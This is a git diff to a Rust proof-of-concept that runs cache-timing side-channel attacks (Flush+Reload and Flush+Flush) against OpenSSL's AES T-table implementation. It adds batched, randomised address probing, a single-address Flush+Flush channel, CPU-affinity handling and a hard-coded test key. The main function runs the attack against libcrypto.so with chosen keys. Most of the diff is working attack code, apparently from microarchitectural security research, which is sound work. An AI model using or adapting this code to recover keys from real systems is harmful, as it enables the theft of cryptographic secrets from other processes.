diff --git a/aes-t-tables/src/lib.rs b/aes-t-tables/src/lib.rs index 77efd0e..15c9cc9 100644 --- a/aes-t-tables/src/lib.rs +++ b/aes-t-tables/src/lib.rs @@ -8,6 +8,8 @@ use crate::CacheStatus::Miss; use memmap2::Mmap; use openssl::aes::aes_ige; use openssl::symm::Mode; +use rand::seq::SliceRandom; +use rand::thread_rng; use std::collections::HashMap; use std::fmt::Debug; use std::fs::File; @@ -93,9 +95,9 @@ pub trait TableCacheSideChannel { /// # Safety /// /// addresses must contain only valid pointers to read. - unsafe fn attack<'a, 'b>( + unsafe fn attack<'a, 'b, 'c>( &'a mut self, - addresses: impl IntoIterator + Clone, + addresses: impl Iterator + Clone, victim: &'b dyn Fn(), num_iteration: u32, ) -> Result, ChannelFatalError>; @@ -122,22 +124,21 @@ pub trait SingleAddrCacheSideChannel: Debug { } pub trait MultipleAddrCacheSideChannel: Debug { - //type MultipleChannelFatalError: Debug; - + const MAX_ADDR: u32; /// # Safety /// /// addresses must contain only valid pointers to read. - unsafe fn test( - &mut self, - addresses: impl IntoIterator + Clone, + unsafe fn test<'a, 'b, 'c>( + &'a mut self, + addresses: &'b mut (impl Iterator + Clone), ) -> Result, SideChannelError>; /// # Safety /// /// addresses must contain only valid pointers to read. - unsafe fn prepare( - &mut self, - addresses: impl IntoIterator + Clone, + unsafe fn prepare<'a, 'b, 'c>( + &'a mut self, + addresses: &'b mut (impl Iterator + Clone), ) -> Result<(), SideChannelError>; fn victim(&mut self, operation: &dyn Fn()); @@ -159,9 +160,9 @@ impl TableCacheSideChannel for T { } //type ChannelFatalError = T::SingleChannelFatalError; - default unsafe fn attack<'a, 'b>( + default unsafe fn attack<'a, 'b, 'c>( &'a mut self, - addresses: impl IntoIterator + Clone, + addresses: impl Iterator + Clone, victim: &'b dyn Fn(), num_iteration: u32, ) -> Result, ChannelFatalError> { @@ -171,7 +172,7 @@ impl TableCacheSideChannel for T { let mut hit = 0; let mut miss = 0; for iteration in 0..100 { - match unsafe { self.prepare_single(addr) } { + match unsafe { self.prepare_single(*addr) } { Ok(_) => {} Err(e) => match e { SideChannelError::NeedRecalibration => unimplemented!(), @@ -181,7 +182,7 @@ impl TableCacheSideChannel for T { }, } self.victim_single(victim); - let r = unsafe { self.test_single(addr) }; + let r = unsafe { self.test_single(*addr) }; match r { Ok(status) => {} Err(e) => match e { @@ -194,7 +195,7 @@ impl TableCacheSideChannel for T { } } for _iteration in 0..num_iteration { - match unsafe { self.prepare_single(addr) } { + match unsafe { self.prepare_single(*addr) } { Ok(_) => {} Err(e) => match e { SideChannelError::NeedRecalibration => unimplemented!(), @@ -204,7 +205,7 @@ impl TableCacheSideChannel for T { }, } self.victim_single(victim); - let r = unsafe { self.test_single(addr) }; + let r = unsafe { self.test_single(*addr) }; match r { Ok(status) => match status { CacheStatus::Hit => { @@ -223,7 +224,11 @@ impl TableCacheSideChannel for T { }, } } - result.push(TableAttackResult { addr, hit, miss }); + result.push(TableAttackResult { + addr: *addr, + hit, + miss, + }); } Ok(result) } @@ -234,12 +239,12 @@ impl TableCacheSideChannel for T { impl SingleAddrCacheSideChannel for T { unsafe fn test_single(&mut self, addr: *const u8) -> Result { let addresses = vec![addr]; - unsafe { self.test(addresses) }.map(|v| v[0].1) + unsafe { self.test(&mut addresses.iter()) }.map(|v| v[0].1) } unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> { let addresses = vec![addr]; - unsafe { self.prepare(addresses) } + unsafe { self.prepare(&mut addresses.iter()) } } fn victim_single(&mut self, operation: &dyn Fn()) { @@ -255,49 +260,99 @@ impl SingleAddrCacheSideChannel for T { } // TODO limit number of simultaneous tested address + randomise order ? -/* + impl TableCacheSideChannel for T { unsafe fn calibrate( &mut self, addresses: impl IntoIterator + Clone, ) -> Result<(), ChannelFatalError> { - unsafe { s.calibrate(addresses) } + unsafe { self.calibrate(addresses) } } //type ChannelFatalError = T::MultipleChannelFatalError; /// # Safety /// /// addresses must contain only valid pointers to read. - unsafe fn attack<'a, 'b>( + unsafe fn attack<'a, 'b, 'c>( &'a mut self, - addresses: impl IntoIterator + Clone, + mut addresses: impl Iterator + Clone, victim: &'b dyn Fn(), num_iteration: u32, ) -> Result, ChannelFatalError> { - match unsafe { MultipleAddrCacheSideChannel::prepare(self, addresses.clone()) } { - Ok(_) => {} - Err(e) => match e { - SideChannelError::NeedRecalibration => unimplemented!(), - SideChannelError::FatalError(e) => return Err(e), - SideChannelError::AddressNotReady(_addr) => panic!(), - SideChannelError::AddressNotCalibrated(_addr) => unimplemented!(), - }, - } - MultipleAddrCacheSideChannel::victim(self, victim); - - let r = unsafe { MultipleAddrCacheSideChannel::test(self, addresses) }; // Fixme error handling - match r { - Err(e) => match e { - SideChannelError::NeedRecalibration => { - panic!(); + let mut v = Vec::new(); + while let Some(addr) = addresses.next() { + let mut batch = Vec::new(); + batch.push(*addr); + let mut hits: HashMap<*const u8, u32> = HashMap::new(); + let mut misses: HashMap<*const u8, u32> = HashMap::new(); + for i in 1..T::MAX_ADDR { + if let Some(addr) = addresses.next() { + batch.push(*addr); + } else { + break; } - SideChannelError::FatalError(e) => Err(e), - _ => panic!(), - }, - Ok(v) => Ok(v), + } + for i in 0..100 { + // TODO Warmup + } + for i in 0..num_iteration { + match unsafe { MultipleAddrCacheSideChannel::prepare(self, &mut batch.iter()) } { + Ok(_) => {} + Err(e) => match e { + SideChannelError::NeedRecalibration => unimplemented!(), + SideChannelError::FatalError(e) => return Err(e), + SideChannelError::AddressNotReady(_addr) => panic!(), + SideChannelError::AddressNotCalibrated(addr) => { + eprintln!( + "Addr: {:p}\n\ + {:#?}", + addr, self + ); + unimplemented!() + } + }, + } + MultipleAddrCacheSideChannel::victim(self, victim); + + let r = unsafe { MultipleAddrCacheSideChannel::test(self, &mut batch.iter()) }; // Fixme error handling + match r { + Err(e) => match e { + SideChannelError::NeedRecalibration => { + panic!(); + } + SideChannelError::FatalError(e) => { + return Err(e); + } + _ => { + panic!(); + } + }, + Ok(vector) => { + for (addr, status) in vector { + match status { + CacheStatus::Hit => { + *hits.entry(addr).or_default() += 1; + } + CacheStatus::Miss => { + *misses.entry(addr).or_default() += 1; + } + } + } + } + } + } + + for addr in batch { + v.push(TableAttackResult { + addr, + hit: *hits.get(&addr).unwrap_or(&0u32), + miss: *misses.get(&addr).unwrap_or(&0u32), + }) + } } + Ok(v) } -}*/ +} pub struct AESTTableParams<'a> { pub num_encryptions: u32, @@ -333,21 +388,24 @@ pub unsafe fn attack_t_tables_poc( let mut timings: HashMap<*const u8, HashMap> = HashMap::new(); - let addresses = parameters + let mut addresses: Vec<*const u8> = parameters .te .iter() .map(|&start| ((start)..(start + 64 * 16)).step_by(64)) .flatten() - .map(|offset| unsafe { base.offset(offset) }); + .map(|offset| unsafe { base.offset(offset) }) + .collect(); + + addresses.shuffle(&mut thread_rng()); unsafe { side_channel.calibrate(addresses.clone()).unwrap() }; - for addr in addresses.clone() { + for addr in addresses.iter() { let mut timing = HashMap::new(); for b in (u8::min_value()..=u8::max_value()).step_by(16) { timing.insert(b, 0); } - timings.insert(addr, timing); + timings.insert(*addr, timing); } for b in (u8::min_value()..=u8::max_value()).step_by(16) { @@ -367,7 +425,7 @@ pub unsafe fn attack_t_tables_poc( }; let r = - unsafe { side_channel.attack(addresses.clone(), &victim, parameters.num_encryptions) }; + unsafe { side_channel.attack(addresses.iter(), &victim, parameters.num_encryptions) }; match r { Ok(v) => { for table_attack_result in v { @@ -381,6 +439,7 @@ pub unsafe fn attack_t_tables_poc( Err(_) => panic!("Attack failed"), } } + addresses.sort(); for probe in addresses { print!("{:p}", probe); for b in (u8::min_value()..=u8::max_value()).step_by(16) { diff --git a/aes-t-tables/src/main.rs b/aes-t-tables/src/main.rs index baf78fa..1375b3c 100644 --- a/aes-t-tables/src/main.rs +++ b/aes-t-tables/src/main.rs @@ -23,7 +23,8 @@ use cache_utils::complex_addressing::CacheSlicing; use core::fmt; use nix::sched::{sched_getaffinity, sched_setaffinity, CpuSet}; use nix::unistd::Pid; -use std::fmt::{Debug, Formatter}; // TODO +use std::fmt::{Debug, Formatter}; +use std::i8::MAX; // TODO #[derive(Debug)] struct Threshold { @@ -42,6 +43,37 @@ struct FlushAndFlush { thresholds: HashMap>, addresses_ready: HashSet<*const u8>, slicing: CacheSlicing, + original_affinities: CpuSet, +} + +#[derive(Debug)] +struct SingleFlushAndFlush(FlushAndFlush); + +impl SingleFlushAndFlush { + pub fn new() -> Option { + FlushAndFlush::new().map(|ff| SingleFlushAndFlush(ff)) + } +} + +impl SingleAddrCacheSideChannel for SingleFlushAndFlush { + unsafe fn test_single(&mut self, addr: *const u8) -> Result { + unsafe { self.0.test_single(addr) } + } + + unsafe fn prepare_single(&mut self, addr: *const u8) -> Result<(), SideChannelError> { + unsafe { self.0.prepare_single(addr) } + } + + fn victim_single(&mut self, operation: &dyn Fn()) { + self.0.victim_single(operation) + } + + unsafe fn calibrate_single( + &mut self, + addresses: impl IntoIterator + Clone, + ) -> Result<(), ChannelFatalError> { + unsafe { self.0.calibrate_single(addresses) } + } } // Current issue : hash function trips borrow checker. @@ -54,10 +86,13 @@ impl FlushAndFlush { return None; } + let old = sched_getaffinity(Pid::from_raw(0)).unwrap(); + let ret = Self { thresholds: Default::default(), addresses_ready: Default::default(), slicing, + original_affinities: old, }; Some(ret) } else { @@ -70,6 +105,12 @@ impl FlushAndFlush { } } +impl Drop for FlushAndFlush { + fn drop(&mut self) { + sched_setaffinity(Pid::from_raw(0), &self.original_affinities).unwrap(); + } +} + impl Debug for FlushAndFlush { fn fmt(&self, f: &mut Formatter<'_>) -> fmt::Result { f.debug_struct("FlushAndFlush") @@ -99,51 +140,69 @@ fn cum_sum(vector: &[u32]) -> Vec { } impl MultipleAddrCacheSideChannel for FlushAndFlush { - unsafe fn test( - &mut self, - addresses: impl IntoIterator + Clone, + const MAX_ADDR: u32 = 3; + + unsafe fn test<'a, 'b, 'c>( + &'a mut self, + addresses: &'b mut (impl Iterator + Clone), ) -> Result, SideChannelError> { let mut result = Vec::new(); let mut tmp = Vec::new(); + let mut i = 0; for addr in addresses { - let t = unsafe { only_flush(addr) }; + i += 1; + let t = unsafe { only_flush(*addr) }; tmp.push((addr, t)); + if i == Self::MAX_ADDR { + break; + } } for (addr, time) in tmp { if !self.addresses_ready.contains(&addr) { - return Err(AddressNotReady(addr)); + return Err(AddressNotReady(*addr)); } - let vpn: VPN = (addr as usize) & (!0xfff); // FIXME - let slice = self.get_slice(addr); + let vpn: VPN = (*addr as usize) & (!0xfff); // FIXME + let slice = self.get_slice(*addr); let threshold = &self.thresholds[&vpn][&slice]; // refactor this into a struct threshold method ? if threshold.is_hit(time) { - result.push((addr, CacheStatus::Hit)) + result.push((*addr, CacheStatus::Hit)) } else { - result.push((addr, CacheStatus::Miss)) + result.push((*addr, CacheStatus::Miss)) } } Ok(result) } - unsafe fn prepare( - &mut self, - addresses: impl IntoIterator + Clone, + unsafe fn prepare<'a, 'b, 'c>( + &'a mut self, + addresses: &'b mut (impl Iterator + Clone), ) -> Result<(), SideChannelError> { use core::arch::x86_64 as arch_x86; - for addr in addresses.clone() { - let vpn: VPN = get_vpn(addr); - let slice = self.get_slice(addr); + let mut i = 0; + let addresses_cloned = addresses.clone(); + for addr in addresses_cloned { + i += 1; + let vpn: VPN = get_vpn(*addr); + let slice = self.get_slice(*addr); if self.addresses_ready.contains(&addr) { continue; } if !self.thresholds.contains_key(&vpn) || !self.thresholds[&vpn].contains_key(&slice) { - return Err(AddressNotCalibrated(addr)); + return Err(AddressNotCalibrated(*addr)); + } + if i == Self::MAX_ADDR { + break; } } + i = 0; for addr in addresses { - unsafe { flush(addr) }; - self.addresses_ready.insert(addr); + i += 1; + unsafe { flush(*addr) }; + self.addresses_ready.insert(*addr); + if i == Self::MAX_ADDR { + break; + } } unsafe { arch_x86::_mm_mfence() }; Ok(()) @@ -383,6 +442,11 @@ impl MultipleAddrCacheSideChannel for FlushAndFlush { } } +const KEY2: [u8; 32] = [ + 0x51, 0x4d, 0xab, 0x12, 0xff, 0xdd, 0xb3, 0x32, 0x52, 0x8f, 0xbb, 0x1d, 0xec, 0x45, 0xce, 0xcc, + 0x4f, 0x6e, 0x9c, 0x2a, 0x15, 0x5f, 0x5f, 0x0b, 0x25, 0x77, 0x6b, 0x70, 0xcd, 0xe2, 0xf7, 0x80, +]; + fn main() { let open_sslpath = Path::new(env!("OPENSSL_DIR")).join("lib/libcrypto.so"); let mut side_channel = NaiveFlushAndReload::from_threshold(220); @@ -390,36 +454,50 @@ fn main() { attack_t_tables_poc( &mut side_channel, AESTTableParams { - num_encryptions: 1 << 14, + num_encryptions: 1 << 12, key: [0; 32], te: [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140], // adjust me (should be in decreasing order) openssl_path: &open_sslpath, }, ) }; /**/ - let mut side_channel_ff = FlushAndFlush::new().unwrap(); unsafe { attack_t_tables_poc( - &mut side_channel_ff, + &mut side_channel, AESTTableParams { - num_encryptions: 1 << 15, - key: [0; 32], + num_encryptions: 1 << 12, + key: KEY2, te: [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140], // adjust me (should be in decreasing order) openssl_path: &open_sslpath, }, ) }; - /* - let mut side_channel_ff = SingleFlushAndFlush::new().unwrap(); - unsafe { - attack_t_tables_poc( - &mut side_channel_ff, - AESTTableParams { - num_encryptions: 1 << 15, - key: [0; 32], - te: [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140], // adjust me (should be in decreasing order) - openssl_path: &open_sslpath, - }, - ) - };*/ + { + let mut side_channel_ff = FlushAndFlush::new().unwrap(); + unsafe { + attack_t_tables_poc( + &mut side_channel_ff, + AESTTableParams { + num_encryptions: 1 << 12, + key: [0; 32], + te: [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140], // adjust me (should be in decreasing order) + openssl_path: &open_sslpath, + }, + ) + }; + } + { + let mut side_channel_ff = SingleFlushAndFlush::new().unwrap(); + unsafe { + attack_t_tables_poc( + &mut side_channel_ff, + AESTTableParams { + num_encryptions: 1 << 12, + key: KEY2, + te: [0x1b5d40, 0x1b5940, 0x1b5540, 0x1b5140], // adjust me (should be in decreasing order) + openssl_path: &open_sslpath, + }, + ) + }; + } }